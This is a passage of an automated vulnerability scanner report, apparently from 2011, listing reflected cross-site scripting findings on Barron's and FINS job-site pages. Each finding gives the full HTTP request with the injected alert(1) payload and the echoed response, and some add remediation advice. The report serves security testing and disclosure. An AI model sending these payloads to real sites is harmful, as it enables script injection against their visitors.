X-DEBUG-BOX-IDENT: sbkj2kwebappp09
X-DEBUG-MODULE-VERSION: DJCS mod_mon 0.7.0.9.5c-2
X-DEBUG-REQUEST: /public/search/results.html?KEYWORDS=%22MIRIAM%20GOTTFRIED%22&ARTICLESEARCHQUERY_PARSER=bylineOR4fa5e"><ScRiPt>alert(1)</ScRiPt>3426fe2fa5b
X-DEBUG-NAMESPACE: app-barrons
Cache-Control:
FastDynaPage-DoNotCache: true
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 85221


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<input type="hidden" name="ARTICLESEARCHQUERY_PARSER"
value="bylineOR4fa5e"><ScRiPt>alert(1)</ScRiPt>3426fe2fa5b"/>
...[SNIP]...

1.99. http://online.barrons.com/public/search/results.html [KEYWORDS parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.barrons.com
Path:   /public/search/results.html

Issue detail

The value of the KEYWORDS request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 548bc\'%3balert(1)//c810fc9d02f was submitted in the KEYWORDS parameter. This input was echoed as 548bc\\';alert(1)//c810fc9d02f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /public/search/results.html?KEYWORDS=%22MIRIAM%20GOTTFRIED%22548bc\'%3balert(1)//c810fc9d02f&ARTICLESEARCHQUERY_PARSER=bylineOR HTTP/1.1
Host: online.barrons.com
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/article/SB50001424052702304605504576554641342164236.html?mod=BOL_hpp_highlight_top
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=48b94c78-7a58-4a1e-88ea-6f536fd5118d; _chartbeat2=b0yv5wl9epl887ug; rsi_csl=; rsi_segs=; DJSESSION=BIZO%3Dbiz%3D1053%3B; Barrons_Community=; s_cc=true; s_sq=djglobal%2Cdjbarrons%3D%2526pid%253DBOL_Barron%252527s%252520Take_SB50001424052702304605504576554641342164236%2526pidt%253D1%2526oid%253Dhttp%25253A//online.barrons.com/public/search/results.html%25253FKEYWORDS%25253D%25252522MIRIAM%25252520GOTTFRIED%25252522%252526ARTICLESEARCH%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:35:36 GMT
X-DEBUG-BOX-IDENT: sbkj2kwebappp11
X-DEBUG-MODULE-VERSION: DJCS mod_mon 0.7.0.9.5c-2
X-DEBUG-REQUEST: /public/search/results.html?KEYWORDS=%22MIRIAM%20GOTTFRIED%22548bc\'%3balert(1)//c810fc9d02f&ARTICLESEARCHQUERY_PARSER=bylineOR
X-DEBUG-NAMESPACE: app-barrons
Cache-Control:
FastDynaPage-DoNotCache: true
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 91745


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
setMetaData('subsection','Search Results');            
       setMetaData('section','Search');            
       setMetaData('primaryproduct','Barrons Online');            
       setMetaData('searchstatement','"MIRIAM GOTTFRIED"548bc\\';alert(1)//c810fc9d02f');            
       setMetaData('ctype','searchresults');            
       setMetaData('sitedomain','online.barrons.com');            
       setMetaData('pagename','SEARCH RESULTS_9_0491');            
       setMetaData('caccess','fre
...[SNIP]...

1.100. http://orbisadvisors.redinews.com/tools/XM01 [fields parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://orbisadvisors.redinews.com
Path:   /tools/XM01

Issue detail

The value of the fields request parameter is copied into the HTML document as plain text between tags. The payload 510d8<a>fae801ceba6 was submitted in the fields parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tools/XM01?queryid=QJ33020&fields=symbol%20rsrrank510d8<a>fae801ceba6&symbol=IYM HTTP/1.1
Host: orbisadvisors.redinews.com
Proxy-Connection: keep-alive
Referer: http://stockoodles.com/v1/MTSNew.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:33 GMT
Server: Apache
Pragma: no-cache
Cache-control: no-cache
Connection: close
Content-Type: text/xml
Expires: Wed, 07 Sep 2011 12:32:33 GMT
Content-Length: 136

<?xml version="1.0"?>
<StockData>
<Stock>
<Symbol>IYM</Symbol>
<Unknown>RSRRANK510D8<A>FAE801CEBA6</Unknown>
</Stock>
</StockData>

1.101. http://sales-jobs.fins.com/JobDetail.aspx [JobId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://sales-jobs.fins.com
Path:   /JobDetail.aspx

Issue detail

The value of the JobId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3290"%3ba31635da494 was submitted in the JobId parameter. This input was echoed as a3290";a31635da494 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /JobDetail.aspx?SourcePage=Jobsearch&JobId=129605a3290"%3ba31635da494&SectorId=&CompanyId=&CompanyName=&Source=&Cities=&StateCodes=&JobName=AT-amp-T-Leadership-Development-Fulltime-Program-GR-Various-Locations HTTP/1.1
Host: sales-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://sales-jobs.fins.com/Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FINSCOUNTRY=ip=50.23.123.106&domain=softlayer.com&company=SoftLayer_Technologies_Inc.&proxy=&country=US&region=CA&city=SANJOSE&dma=807&pmsa=7400&areacode=408&county=SANTACLARA&fips=06085&latitude=37.3353&longitude=-121.8938&timezone=PST&zip=95101+95103+95106+95108-95113+95115-95136+95138-95139+95141+95148+95150-95161+95164+95170+95172-95173+95190-95194+95196&continent=NA&asnum=36351&throughput=vhigh&bw=5000%0a; ASP.NET_SessionId=zkvv5g55vul24tikcf4mns45; s_vnum=1318008818789%26vn%3D1; FinsSearch=RecentSrch=Sales - Technology - hilliard, oh |&QueryString=link%3dFINS_jobs_relatedjobs%24Miles%3d50%24SearchType%3dadvanced%24Search%3dA%24Source%3dcontent%24S%3d45%24SectorName%3dSales%2b-%2bTechnology%24Location%3dHilliard%252c%2bOH|; _chartbeat2=1l9wm5pnn3plmhv2; __utma=1.1638617188.1315416723.1315416723.1315416723.1; __utmb=1.7.10.1315416723; __utmc=1; __utmz=1.1315416723.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/; s_cc=true; s_invisit=true; s_sq=djfulton%2Cdjglobal%3D%2526pid%253DFINS_at-t-application-sales-executive-3-pcg-mac_3%2526pidt%253D1%2526oid%253Dhttp%25253A//sales-jobs.fins.com/JobDetail.aspx%25253FSourcePage%25253DJobsearch%252526JobId%25253D129605%252526SectorId%25253D%252526CompanyId%25253D%252526Com%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:37:48 GMT
Content-Length: 49825


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
s.prop3 = "FINS_Research and Tools_FINS_at-amp-t-leadership-development-fulltime-program-gr-various-locations_3";
s.prop4 = "FINS_";
s.prop5 = "http://sales-jobs.fins.com/Jobs/129605a3290";a31635da494/AT-amp-T-Leadership-Development-Fulltime-Program-GR-Various-Locations";
s.prop6 = "http\x3a\x2f\x2fsales-jobs.fins.com\x3a80\x2fJobs\x2f129605a3290\x22\x3ba31635da494\x2fAT-amp-T-Leadership-D
...[SNIP]...

1.102. http://sales-jobs.fins.com/JobDetail.aspx [SourcePage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales-jobs.fins.com
Path:   /JobDetail.aspx

Issue detail

The value of the SourcePage request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f34f'-alert(1)-'dfa765092f0 was submitted in the SourcePage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /JobDetail.aspx?SourcePage=Jobsearch8f34f'-alert(1)-'dfa765092f0&JobId=129605&SectorId=&CompanyId=&CompanyName=&Source=&Cities=&StateCodes=&JobName=AT-amp-T-Leadership-Development-Fulltime-Program-GR-Various-Locations HTTP/1.1
Host: sales-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://sales-jobs.fins.com/Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FINSCOUNTRY=ip=50.23.123.106&domain=softlayer.com&company=SoftLayer_Technologies_Inc.&proxy=&country=US&region=CA&city=SANJOSE&dma=807&pmsa=7400&areacode=408&county=SANTACLARA&fips=06085&latitude=37.3353&longitude=-121.8938&timezone=PST&zip=95101+95103+95106+95108-95113+95115-95136+95138-95139+95141+95148+95150-95161+95164+95170+95172-95173+95190-95194+95196&continent=NA&asnum=36351&throughput=vhigh&bw=5000%0a; ASP.NET_SessionId=zkvv5g55vul24tikcf4mns45; s_vnum=1318008818789%26vn%3D1; FinsSearch=RecentSrch=Sales - Technology - hilliard, oh |&QueryString=link%3dFINS_jobs_relatedjobs%24Miles%3d50%24SearchType%3dadvanced%24Search%3dA%24Source%3dcontent%24S%3d45%24SectorName%3dSales%2b-%2bTechnology%24Location%3dHilliard%252c%2bOH|; _chartbeat2=1l9wm5pnn3plmhv2; __utma=1.1638617188.1315416723.1315416723.1315416723.1; __utmb=1.7.10.1315416723; __utmc=1; __utmz=1.1315416723.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/; s_cc=true; s_invisit=true; s_sq=djfulton%2Cdjglobal%3D%2526pid%253DFINS_at-t-application-sales-executive-3-pcg-mac_3%2526pidt%253D1%2526oid%253Dhttp%25253A//sales-jobs.fins.com/JobDetail.aspx%25253FSourcePage%25253DJobsearch%252526JobId%25253D129605%252526SectorId%25253D%252526CompanyId%25253D%252526Com%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:37:32 GMT
Content-Length: 60992


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://sales-jobs.fins.com/Jobs/129605/AT-amp-T-Leadership-Development-Fulltime-Program-GR-Various-Locations?SourcePage=Jobsearch8f34f'-alert(1)-'dfa765092f0&JobId=129605&JobName=AT-amp-T-Leadership-Development-Fulltime-Program-GR-Various-Locations';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
var OB_langJS ='http://widgets.outbrain.com/
...[SNIP]...

1.103. http://sales-jobs.fins.com/Jobs/131547/SiteManagement-Trainee [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://sales-jobs.fins.com
Path:   /Jobs/131547/SiteManagement-Trainee

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9bb54'%3bfca5fe2f801 was submitted in the REST URL parameter 2. This input was echoed as 9bb54';fca5fe2f801 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Jobs/1315479bb54'%3bfca5fe2f801/SiteManagement-Trainee?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD HTTP/1.1
Host: sales-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FINSCOUNTRY=ip=50.23.123.106&domain=softlayer.com&company=SoftLayer_Technologies_Inc.&proxy=&country=US&region=CA&city=SANJOSE&dma=807&pmsa=7400&areacode=408&county=SANTACLARA&fips=06085&latitude=37.3353&longitude=-121.8938&timezone=PST&zip=95101+95103+95106+95108-95113+95115-95136+95138-95139+95141+95148+95150-95161+95164+95170+95172-95173+95190-95194+95196&continent=NA&asnum=36351&throughput=vhigh&bw=5000%0a; ASP.NET_SessionId=zkvv5g55vul24tikcf4mns45; __utma=1.1638617188.1315416723.1315416723.1315416723.1; __utmb=1.1.10.1315416723; __utmc=1; __utmz=1.1315416723.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:37:47 GMT
Content-Length: 50924


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://sales-jobs.fins.com/Jobs/1315479bb54';fca5fe2f801/SiteManagement-Trainee?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&JobId=1315479bb54';fca5fe2f801&JobName=SiteManagement-Trainee';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'
...[SNIP]...

1.104. http://sales-jobs.fins.com/Jobs/131547/SiteManagement-Trainee [cobrand parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales-jobs.fins.com
Path:   /Jobs/131547/SiteManagement-Trainee

Issue detail

The value of the cobrand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db32d'-alert(1)-'f634657a8f4 was submitted in the cobrand parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Jobs/131547/SiteManagement-Trainee?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATDdb32d'-alert(1)-'f634657a8f4 HTTP/1.1
Host: sales-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FINSCOUNTRY=ip=50.23.123.106&domain=softlayer.com&company=SoftLayer_Technologies_Inc.&proxy=&country=US&region=CA&city=SANJOSE&dma=807&pmsa=7400&areacode=408&county=SANTACLARA&fips=06085&latitude=37.3353&longitude=-121.8938&timezone=PST&zip=95101+95103+95106+95108-95113+95115-95136+95138-95139+95141+95148+95150-95161+95164+95170+95172-95173+95190-95194+95196&continent=NA&asnum=36351&throughput=vhigh&bw=5000%0a; ASP.NET_SessionId=zkvv5g55vul24tikcf4mns45; __utma=1.1638617188.1315416723.1315416723.1315416723.1; __utmb=1.1.10.1315416723; __utmc=1; __utmz=1.1315416723.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:35:05 GMT
Content-Length: 59331


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://sales-jobs.fins.com/Jobs/131547/SiteManagement-Trainee?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATDdb32d'-alert(1)-'f634657a8f4&JobId=131547&JobName=SiteManagement-Trainee';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
var OB_langJS ='http://widgets.outbrain.com/lang_en.js';
if ( typeof(OB_Script)!='undefine
...[SNIP]...

1.105. http://sales-jobs.fins.com/Jobs/131547/SiteManagement-Trainee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales-jobs.fins.com
Path:   /Jobs/131547/SiteManagement-Trainee

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7d15'-alert(1)-'b16f3950789 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Jobs/131547/SiteManagement-Trainee?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&f7d15'-alert(1)-'b16f3950789=1 HTTP/1.1
Host: sales-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FINSCOUNTRY=ip=50.23.123.106&domain=softlayer.com&company=SoftLayer_Technologies_Inc.&proxy=&country=US&region=CA&city=SANJOSE&dma=807&pmsa=7400&areacode=408&county=SANTACLARA&fips=06085&latitude=37.3353&longitude=-121.8938&timezone=PST&zip=95101+95103+95106+95108-95113+95115-95136+95138-95139+95141+95148+95150-95161+95164+95170+95172-95173+95190-95194+95196&continent=NA&asnum=36351&throughput=vhigh&bw=5000%0a; ASP.NET_SessionId=zkvv5g55vul24tikcf4mns45; __utma=1.1638617188.1315416723.1315416723.1315416723.1; __utmb=1.1.10.1315416723; __utmc=1; __utmz=1.1315416723.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:37:00 GMT
Content-Length: 60961


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://sales-jobs.fins.com/Jobs/131547/SiteManagement-Trainee?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&f7d15'-alert(1)-'b16f3950789=1&JobId=131547&JobName=SiteManagement-Trainee';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
var OB_langJS ='http://widgets.outbrain.com/lang_en.js';
if ( typeof(OB_Script)!='undefi
...[SNIP]...

1.106. http://sales-jobs.fins.com/Jobs/131547/SiteManagement-Trainee [reflink parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales-jobs.fins.com
Path:   /Jobs/131547/SiteManagement-Trainee

Issue detail

The value of the reflink request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f134'-alert(1)-'f9c84c54baf was submitted in the reflink parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Jobs/131547/SiteManagement-Trainee?reflink=djm_modulewsj_widgetjobs_jobsatdmedia3f134'-alert(1)-'f9c84c54baf&cobrand=ATD HTTP/1.1
Host: sales-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FINSCOUNTRY=ip=50.23.123.106&domain=softlayer.com&company=SoftLayer_Technologies_Inc.&proxy=&country=US&region=CA&city=SANJOSE&dma=807&pmsa=7400&areacode=408&county=SANTACLARA&fips=06085&latitude=37.3353&longitude=-121.8938&timezone=PST&zip=95101+95103+95106+95108-95113+95115-95136+95138-95139+95141+95148+95150-95161+95164+95170+95172-95173+95190-95194+95196&continent=NA&asnum=36351&throughput=vhigh&bw=5000%0a; ASP.NET_SessionId=zkvv5g55vul24tikcf4mns45; __utma=1.1638617188.1315416723.1315416723.1315416723.1; __utmb=1.1.10.1315416723; __utmc=1; __utmz=1.1315416723.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:33:28 GMT
Content-Length: 61092


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://sales-jobs.fins.com/Jobs/131547/SiteManagement-Trainee?reflink=djm_modulewsj_widgetjobs_jobsatdmedia3f134'-alert(1)-'f9c84c54baf&cobrand=ATD&JobId=131547&JobName=SiteManagement-Trainee';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
var OB_langJS ='http://widgets.outbrain.com/lang_en.js';
if ( typeof(OB_Script
...[SNIP]...

1.107. http://sales-jobs.fins.com/Jobs/131750/Acct-Exec-Small-Business-Sales [cobrand parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales-jobs.fins.com
Path:   /Jobs/131750/Acct-Exec-Small-Business-Sales

Issue detail

The value of the cobrand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d412c'-alert(1)-'1cf6036fd5b was submitted in the cobrand parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Jobs/131750/Acct-Exec-Small-Business-Sales?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATDd412c'-alert(1)-'1cf6036fd5b HTTP/1.1
Host: sales-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
